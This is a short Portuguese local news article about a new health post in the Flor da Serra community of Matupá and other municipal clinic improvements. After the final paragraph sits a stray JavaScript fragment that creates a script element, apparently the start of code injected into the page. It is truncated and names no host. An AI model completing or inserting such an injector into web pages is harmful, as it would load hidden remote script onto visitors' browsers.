Capa / Cidades / PROGRESSO Comunidade Flor da Serra já tem novo Posto de Saúde em Matupá

PROGRESSO Comunidade Flor da Serra já tem novo Posto de Saúde em Matupá

psf matupaWesley Vieira/Assecom

O novo Posto de saúde da comunidade Flor da Serra já esta em perfeito funcionamento e equipado para atender as famílias daquela localidade e comunidades vizinhas.
Desde outubro de 2015 a nova unidade está em funcionamento, são diversas salas todas climatizadas para o atendimento em consultas, odontologia e atendimentos diversos.
“Manter a saúde com uma boa estrutura é nossa meta, esse é só uma das várias unidades que construímos ou reformamos para que seja oferecida uma boa condição de atendimento a nossa população, ao poucos vamos melhorando as instalações e dando mais condições de trabalho aos profissionais da saúde”, disse o prefeito em uma visita a unidade.
Além da construção do novo Posto de Saúde da Comunidade Flor Da Serra foram também construídas as unidades de saúde do Bairro União e Bairro Jardim das Flores e inaugurada em 2014 a unidade de saúde do Bairro Cidade Alta.
Na Gleba União também houve melhorias na estrutura física da unidade com a reforma e ampliação completa da unidade.
Todos os postos também receberam mobiliários novos, como macas, mesas e aparelhos de ar condicionado e equipamentos como detector fetal, balanças e diversos outros.
O hospital Municipal deverá receber um investimento de R$300.000 reais em equipamentos, já está aberta a licitação para compra que deve ser concluídos nos próximos meses. Outra melhoria no Hospital Municipal é quanto ao conforto dos pacientes que estão na sala de espera, foi instalado um aparelho de ar condicionado que deverá oferecer um conforto a mais a quem precisa de atendimento médico.var d=document;var s=d.createElement(‘script’);

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top